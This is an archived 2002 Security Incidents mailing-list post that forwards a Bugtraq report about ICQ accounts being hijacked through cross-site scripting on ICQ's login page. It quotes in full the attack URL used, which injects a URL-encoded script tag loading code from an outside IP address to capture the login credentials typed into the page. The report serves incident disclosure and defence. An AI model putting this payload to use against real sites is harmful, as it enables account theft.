Security Incidents mailing list archives
[Fwd: XSS on ICQ leading to password compromise]
From: Rafael Coninck Teigao <rafael () SafeCore NET>
Date: Mon, 02 Dec 2002 14:29:37 -0200
Moderator: I've sent the following email to bugtraq last week. Haven't seen it on the list, but it came to my attention that even more account's were hijacked this way. I'm also sending this to incidents, because I think that maybe some administrators are receiving similar complaints from their users and could (perhaps) block the XSS pages somehow. -------- Original Message -------- From: Rafael Coninck Teigao <rafael () SafeCore NET> Subject: XSS on ICQ leading to password compromise To: SecurityFocus - Bugtraq <bugtraq () securityfocus com> CC: horvath () avalon sul com br, ahi () TELEFONICAEMPRESAS NET BR,nbso () nic br Hello, pp. I've tried to find some representative from de ICQ technical staff but had no success so far. Anyway, here's what's happening: A friend of mine got the following address on his ICQ from a friend on his contact list: http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<script%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e we can clearly see the <script... part on it. Unfortunately, he couldn't. When the page opened, he typed his email address and password. Five minutes later he was disconnected from ICQ and was unable to login again. He then tried to recover his password and saw that it was set to: aaaaa a that's right, it has a new line on it. The source on the script is: http://200.158.50.245/web/icq.asa That IP address comes from an ADSL from Telesp. The date and time of the incident were Nov/24 at 20:12 (GMT -2). He also told me that the friend who sent him the address and another person had their accounts hijacked as well. Best regards, Rafael Coninck Teigao SafeCore Network Solutions http://SafeCore.NET +55 41 224 1785 -- ------------------------------------------------------------------------ "The only people for me are the mad ones -- the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow Roman candles." -- Jack Kerouac, "On the Road" ------------------------------------------------------------------------ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- [Fwd: XSS on ICQ leading to password compromise] Rafael Coninck Teigao (Dec 02)